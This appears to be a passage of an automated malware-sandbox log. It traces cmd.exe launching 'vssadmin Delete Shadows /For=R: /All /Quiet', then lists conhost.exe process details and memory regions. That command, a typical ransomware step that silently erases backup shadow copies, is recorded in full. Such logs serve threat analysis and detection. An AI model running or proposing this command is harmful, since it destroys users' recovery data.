	[0250.594] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0250.594] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0250.595] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0250.596] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0250.597] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0250.598] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0250.599] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0250.600] GetProcessHeap () returned 0x47e0000
	[0250.600] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x210) returned 0x47e58b8
	[0250.600] GetProcessHeap () returned 0x47e0000
	[0250.601] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x64) returned 0x47e5ad0
	[0250.601] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0250.601] GetProcessHeap () returned 0x47e0000
	[0250.601] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x418) returned 0x47e5b40
	[0250.602] SetErrorMode (uMode=0x0) returned 0x0
	[0250.602] SetErrorMode (uMode=0x1) returned 0x0
	[0250.602] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x47e5b48, lpFilePart=0x18edfc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18edfc*="Desktop") returned 0x1d
	[0250.602] SetErrorMode (uMode=0x0) returned 0x1
	[0250.602] GetProcessHeap () returned 0x47e0000
	[0250.602] RtlReAllocateHeap (Heap=0x47e0000, Flags=0x0, Ptr=0x47e5b40, Size=0x56) returned 0x47e5b40
	[0250.603] GetProcessHeap () returned 0x47e0000
	[0250.603] RtlSizeHeap (HeapHandle=0x47e0000, Flags=0x0, MemoryPointer=0x47e5b40) returned 0x56
	[0250.603] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0250.603] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0250.603] GetProcessHeap () returned 0x47e0000
	[0250.604] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x182) returned 0x47e5ba0
	[0250.604] GetProcessHeap () returned 0x47e0000
	[0250.604] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x2fc) returned 0x47e05c8
	[0250.720] GetProcessHeap () returned 0x47e0000
	[0250.720] RtlReAllocateHeap (Heap=0x47e0000, Flags=0x0, Ptr=0x47e05c8, Size=0x184) returned 0x47e05c8
	[0250.720] GetProcessHeap () returned 0x47e0000
	[0250.720] RtlSizeHeap (HeapHandle=0x47e0000, Flags=0x0, MemoryPointer=0x47e05c8) returned 0x184
	[0250.721] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0250.721] GetProcessHeap () returned 0x47e0000
	[0250.721] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0xe0) returned 0x47e5d30
	[0250.726] GetProcessHeap () returned 0x47e0000
	[0250.726] RtlReAllocateHeap (Heap=0x47e0000, Flags=0x0, Ptr=0x47e5d30, Size=0x76) returned 0x47e5d30
	[0250.727] GetProcessHeap () returned 0x47e0000
	[0250.727] RtlSizeHeap (HeapHandle=0x47e0000, Flags=0x0, MemoryPointer=0x47e5d30) returned 0x76
	[0250.728] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.729] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb88) returned 0xffffffff
	[0250.733] GetLastError () returned 0x2
	[0250.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.734] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb88) returned 0xffffffff
	[0250.738] GetLastError () returned 0x2
	[0250.738] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0250.738] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18eb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb88) returned 0x47e5db0
	[0250.739] GetProcessHeap () returned 0x47e0000
	[0250.739] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x0, Size=0x14) returned 0x47e5df0
	[0250.739] FindClose (in: hFindFile=0x47e5db0 | out: hFindFile=0x47e5db0) returned 1
	[0250.739] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18eb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb88) returned 0xffffffff
	[0250.740] GetLastError () returned 0x2
	[0250.740] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18eb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18eb88) returned 0x47e5db0
	[0250.740] GetProcessHeap () returned 0x47e0000
	[0250.740] RtlReAllocateHeap (Heap=0x47e0000, Flags=0x0, Ptr=0x47e5df0, Size=0x4) returned 0x47e5df0
	[0250.740] FindClose (in: hFindFile=0x47e5db0 | out: hFindFile=0x47e5db0) returned 1
	[0250.741] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0250.741] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0250.741] GetConsoleTitleW (in: lpConsoleTitle=0x18f07c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0250.955] InitializeProcThreadAttributeList (in: lpAttributeList=0x18efa8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18ef8c | out: lpAttributeList=0x18efa8, lpSize=0x18ef8c) returned 1
	[0250.955] UpdateProcThreadAttribute (in: lpAttributeList=0x18efa8, dwFlags=0x0, Attribute=0x60001, lpValue=0x18ef94, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18efa8, lpPreviousValue=0x0) returned 1
	[0250.956] GetStartupInfoW (in: lpStartupInfo=0x18efe0 | out: lpStartupInfo=0x18efe0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0250.956] GetProcessHeap () returned 0x47e0000
	[0250.956] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0x18) returned 0x47e5db0
	[0250.956] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0250.956] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0250.957] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0250.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0250.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0250.957] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0250.957] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.958] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0250.959] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0250.960] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0250.960] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0250.960] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0250.960] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0250.960] GetProcessHeap () returned 0x47e0000
	[0250.960] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47e5db0) returned 1
	[0250.960] GetProcessHeap () returned 0x47e0000
	[0250.960] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0xa) returned 0x47e5db0
	[0250.960] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
	[0250.968] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  Delete Shadows /For=R: /All /Quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x18ef30*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  Delete Shadows /For=R: /All /Quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef7c | out: lpCommandLine="vssadmin  Delete Shadows /For=R: /All /Quiet ", lpProcessInformation=0x18ef7c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xba0, dwThreadId=0xbf4)) returned 1
	[0251.011] CloseHandle (hObject=0xa4) returned 1
	[0251.011] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0251.011] GetProcessHeap () returned 0x47e0000
	[0251.011] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47e7938) returned 1
	[0251.011] GetEnvironmentStringsW () returned 0x47e6d90*
	[0251.012] GetProcessHeap () returned 0x47e0000
	[0251.012] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0xb9c) returned 0x47e7938
	[0251.012] memcpy (in: _Dst=0x47e7938, _Src=0x47e6d90, _Size=0xb9c | out: _Dst=0x47e7938) returned 0x47e7938
	[0251.012] FreeEnvironmentStringsA (penv="=") returned 1
	[0251.012] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0
	[0267.575] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x18ef14 | out: lpExitCode=0x18ef14*=0x2) returned 1
	[0267.576] CloseHandle (hObject=0xa8) returned 1
	[0267.577] _vsnwprintf (in: _Buffer=0x18effc, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ef1c | out: _Buffer="00000002") returned 8
	[0267.579] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1
	[0267.580] GetProcessHeap () returned 0x47e0000
	[0267.580] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47e7938) returned 1
	[0267.580] GetEnvironmentStringsW () returned 0x47e6d90*
	[0267.580] GetProcessHeap () returned 0x47e0000
	[0267.580] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0xbc2) returned 0x47ebfe0
	[0267.580] memcpy (in: _Dst=0x47ebfe0, _Src=0x47e6d90, _Size=0xbc2 | out: _Dst=0x47ebfe0) returned 0x47ebfe0
	[0267.580] FreeEnvironmentStringsA (penv="=") returned 1
	[0267.581] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0267.581] GetProcessHeap () returned 0x47e0000
	[0267.581] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47ebfe0) returned 1
	[0267.581] GetEnvironmentStringsW () returned 0x47e6d90*
	[0267.581] GetProcessHeap () returned 0x47e0000
	[0267.581] RtlAllocateHeap (HeapHandle=0x47e0000, Flags=0x8, Size=0xbc2) returned 0x47ebfe0
	[0267.581] memcpy (in: _Dst=0x47ebfe0, _Src=0x47e6d90, _Size=0xbc2 | out: _Dst=0x47ebfe0) returned 0x47ebfe0
	[0267.581] FreeEnvironmentStringsA (penv="=") returned 1
	[0267.581] GetProcessHeap () returned 0x47e0000
	[0267.581] RtlFreeHeap (HeapHandle=0x47e0000, Flags=0x0, BaseAddress=0x47e5db0) returned 1
	[0267.581] DeleteProcThreadAttributeList (in: lpAttributeList=0x18efa8 | out: lpAttributeList=0x18efa8) 
	[0267.581] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0267.581] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1
	[0267.699] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0267.699] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x31f40c | out: lpMode=0x31f40c) returned 1
	[0267.882] _get_osfhandle (_FileHandle=0) returned 0x38
	[0267.882] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x31f408 | out: lpMode=0x31f408) returned 1
	[0267.941] SetConsoleInputExeNameW () returned 0x1
	[0267.941] GetConsoleOutputCP () returned 0x1b5
	[0268.251] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x31f460 | out: lpCPInfo=0x31f460) returned 1
	[0268.251] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0268.580] exit (_Code=2) 

Thread:
	id = 108
	os_tid = 0xa4c


Process:
	id = "32"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x2fbd6000"
	os_pid = "0x10c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "31"
	os_parent_pid = "0x13fc"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 2201
	        start_va = 0x3ec00000
	          end_va = 0x3edfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000003ec00000"
	        filename = ""

Region:
	              id = 2202
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2203
	        start_va = 0x9a3eb00000
	          end_va = 0x9a3eb3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000009a3eb00000"
	        filename = ""

Region:
	              id = 2204
	        start_va = 0x9a3ec00000
	          end_va = 0x9a3edfffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000009a3ec00000"
	        filename = ""

Region:
	              id = 2205
	        start_va = 0x19e53fc0000
	          end_va = 0x19e53fdffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e53fc0000"
	        filename = ""

Region:
	              id = 2206
	        start_va = 0x19e53fe0000
	          end_va = 0x19e53ff4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e53fe0000"
	        filename = ""

Region:
	              id = 2207
	        start_va = 0x7df5ffe20000
	          end_va = 0x7ff5ffe1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ffe20000"
	        filename = ""

Region:
	              id = 2208
	        start_va = 0x7ff7ff0a0000
	          end_va = 0x7ff7ff0c2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff0a0000"
	        filename = ""

Region:
	              id = 2209
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 2210
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2211
	        start_va = 0x19e54000000
	          end_va = 0x19e5426ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e54000000"
	        filename = ""

Region:
	              id = 2212
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2215
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2216
	        start_va = 0x19e53fc0000
	          end_va = 0x19e53fcffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e53fc0000"
	        filename = ""

Region:
	              id = 2217
	        start_va = 0x7ff7fefa0000
	          end_va = 0x7ff7ff09ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fefa0000"
	        filename = ""

Region:
	              id = 2218
	        start_va = 0x19e54000000
	          end_va = 0x19e540bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2219
	        start_va = 0x19e54170000
	          end_va = 0x19e5426ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e54170000"
	        filename = ""

Region:
	              id = 2223
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2224
	        start_va = 0x9a3eb40000
	          end_va = 0x9a3eb7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000009a3eb40000"
	        filename = ""

Region:
	              id = 2225
	        start_va = 0x19e540c0000
	          end_va = 0x19e5412ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e540c0000"
	        filename = ""

Region:
	              id = 2226
	        start_va = 0x19e53fd0000
	          end_va = 0x19e53fd6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e53fd0000"
	        filename = ""

Region:
	              id = 2227
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 2228
	        start_va = 0x19e540c0000
	          end_va = 0x19e540c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000019e540c0000"
	        filename = ""

Region:
	              id = 2229
	        start_va = 0x19e54120000
	          end_va = 0x19e5412ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e54120000"
	        filename = ""

Region:
	              id = 2230
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2233
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2234
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2235
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2236
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2237
	        start_va = 0x19e540d0000
	          end_va = 0x19e540d6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000019e540d0000"
	        filename = ""

Region:
	              id = 2238
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
